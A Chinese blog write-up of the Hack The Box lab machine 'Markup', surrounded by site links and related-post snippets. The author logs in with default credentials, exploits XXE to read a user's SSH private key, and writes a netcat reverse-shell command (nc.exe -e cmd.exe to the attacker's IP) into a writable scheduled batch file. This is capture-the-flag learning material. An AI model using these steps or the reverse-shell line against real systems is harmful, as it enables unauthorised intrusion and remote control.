[渗透测试]HTB-Markup

最新推荐文章于 2024-10-16 17:15:20 发布
最新推荐文章于 2024-10-16 17:15:20 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: 网络安全 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47224111/article/details/121446808
版权

0x01信息收集

在这里插入图片描述
nmap 常规扫一波

在这里插入图片描述
开了80 22 443 端口

0x02 先看看80端口

在这里插入图片描述
除了一个登录页面啥也没有
admin
password
成功登录
在这个order 的地方 使用xml传订单。可能存在XXE,xxe是没有对外部实体的安全性验证而导致恶意外部实体被执行,可能导致lfi或者RCE
在这里插入图片描述

在这里插入图片描述
是存在XXE的
在这里插入图片描述
在返回包里看见了疑似账号的名字daniel
又开了22端口 我们可以去读取目标的私钥

地址是c://User/daniel/.ssh/id_rsa

在这里插入图片描述
成功了 我们可以通过ssh登录了
将私钥保存为id_rsa

ssh -i id_rsa daniel@10.129.183.135
在这里插入图片描述
在桌面看见userflag
C盘根目录下看见一个 Log-Management文件夹 进去看 是个脚本
type一下 发现是清理日志用的
在这里插入图片描述
在这里插入图片描述
这里用powershell ps了一下 发现了之前那个进程 可能有定时任务什么的

在这里插入图片描述
icacls 查看文件权限 显示BUILTIN \ Users组具有对该文件的完全控制(F)。 BUILTIN \ Users组代表所有本地用户,其中也包括Daniel

在这里插入图片描述
传一个nc过去 将nc连接语句写入job.bat 并执行

echo c:\Log-Management\nc.exe -e cmd.exe 10.1
0.14.26 1234 > c:\Log-Management\job.bat & job.bat

在这里插入图片描述

获取不到administrator权限,寄!

hedianshui888
关注
专栏目录
HTB_Markup_xml注入读ssh私钥&进程注入
网络安全学习
01-31 588
HTB_Markup_xml注入读ssh私钥&进程注入
HTB系列】靶机Vault的渗透测试详解
大方子
04-25 1031
Kali: 10.10.14.213 靶机地址:10.10.10.109 先用nmap探测靶机 nmap -sC -sT -sV 10.10.10.109 扫描结果如下: 看看80端口有什么东西 我们用gobuster进行探测下 gobuster -u http://10.10.10.109 -w /usr/share/wordlists/...
HTB-MarkUp(XXE漏洞、SSH id_rsa密钥)
weixin_58038441的博客
09-15 891
我们介绍了XXE漏洞原理,修复意见,利用方式,修改管理员权限文件 修改代码 反弹会话及id_rsa密钥。
[渗透测试]HTB-Oopsie
weixin_47224111的博客
11-15 1319
0x01 信息收集 nmap扫描 发现80端口 和22端口
[渗透测试]HTB-Include
weixin_47224111的博客
11-20 1092
0x01 信息收集 nmap -sC -sV -T4 -sU 10.129.171.221 -sU 扫描UDP端口 发现开放了tftp TFTP(Trivial File Transfer Protocol,简单文件传输协议)是TCP/IP协议族中的一个用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服务。端口号为69。 tftp 10.129.171.221 可以直接连接 这样我们就可以往服务器上传文件 或者下载文件了 0x02对80端口测试 访问80端口 http:
[渗透测试]HTB-Archetype
weixin_47224111的博客
11-12 2288
0x01 信息收集 使用nmap扫描 目标 nmap -Pn -sC 10.129.61.193 //-sC 使用脚本扫描 -Pn 跳过主机发现,直接扫描端口 0x02 对445端口进行测试 Smbclient 是linux上用于连接smb服务的工具 smbclient -L // -L 列出所有共享用户 存在 backups 匿名登录 smbclient -N //10.129.61.193/backups/ 登录成功 发现数据库账号密码 0x03 对1433端口进行测试 select
HTB-BoardLight靶机笔记
LINGX5的博客
08-18 828
HTB的靶机BoardLight靶机地址:https://app.hackthebox.com/machines/BoardLight通过nmap扫描发现目标靶机开启了22,80端口对80端口的http服务进行了目录爆破和子域名爆破,发现了doblarr的cms框架,通过google搜索,找到了 Exploit-for-Dolibarr-17.0.0-CVE-2023-30253漏洞的利用脚本。通过利用cms的漏洞成功获得shell,通过对配置的阅读,发现了一组凭据!,成功获得了用户的shell。
[渗透测试]HTB-Vaccine
weixin_47224111的博客
11-17 1121
0x01 信息收集 nmap -sC -sV 10.129.41.14 发现21 ftp 22 ssh 80 web 端口开放 其中21端口允许anonymous匿名登录 0x02对22端口测试 ftp 10.129.41.14 anonymous 发现存在一个back.zip 文件 解压发现存在密码 使用zip2john backup.zip > hashes 将backup.zip 的哈希导出 john -wordlist=/usr/share/wordlists/rockyou.txt h
从0开始学渗透----HTB----Meow
yangmahaonan的博客
11-27 572
可以看到靶机只开放了23端口的talnet服务,查询可知Telnet是一种默认不加密的不安全协议,可以通过它连接到本地网络中的其他系统。这里我们选择第34个:auxiliary/scanner/telnet/telnet_login。接着我们尝试常见弱密码:admin/administrator/root或者空白登录。(两个txt文件都是自己写上去几个的,如果用正常字典的话跑的太慢啦!爆破成功得到用户名root,用telnet登录即可。查看文件成功拿到flag.ping通了进行下一步。
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
htb-beep
m0_55772907的博客
09-15 980
一般
Spring Boot视频网站:安全与可扩展性设计
2401_85702623的博客
10-16 1076
本次程序开发选用的数据库管理工具是MySQL数据管理工具,使用它存放数据也需要创建程序对应的数据库文件,并命名刚创建的数据库文件,有了数据库也需要创建各种数据表来充实数据库,在数据表的创建中,不仅需要对数据表命名,也需要对数据表的字段进行设计,包括每个数据表里面需要设置的字段名称,字段对应的数据类型信息,字段的主键设置这个也是不可缺少的,因为每个数据表里面的主键就是标记着这个数据表跟其他数据表相区分的唯一标志。addtime timestamp 否 CURRENT_TIMESTAMP 创建时间。
Gin框架操作指南08:日志与安全
技术卷的博客
10-16 983
本节演示日志与安全相关的API,包括定义路由日志的格式;如何记录日志;安全页眉;使用BasicAuth中间件;使用HTTP方法。
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 635
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
[漏洞挖掘与防护] 04.Windows系统安全缺陷之5次Shift漏洞启动计算机机理分析
杨秀璋的专栏
10-16 184
上一篇文章详细介绍了WinRAR漏洞(CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。这篇文章将分享Windows系统漏洞,通过5次Shift漏洞重改CMD,最终实现修改计算机密码并启动计算机,其思路还是比较有趣的,希望对您有所帮助!基础性文章,希望对入门的同学有帮助。
红日安全vulnstack (一)
最新发布
saber的博客
10-16 1282
红日靶场从0-1教程,参考大量文章复现而来 有踩过的坑也有真正拿下权限的时候,有失有得这才是渗透嘛
常见的内网渗透思路及方法(包含示例)
xixixi7777的博客
10-11 1252
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞。
HTB攻防记:Stocker,子域探索与XSS利用
该环境主要涉及web安全Linux系统、JavaScript(JS)以及网络安全渗透测试技能的实践。首先,通过使用Nmap工具进行网络探测,攻击者定位了目标IP地址10.129.51.243,并将其添加到hosts文件中以便更方便地访问。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值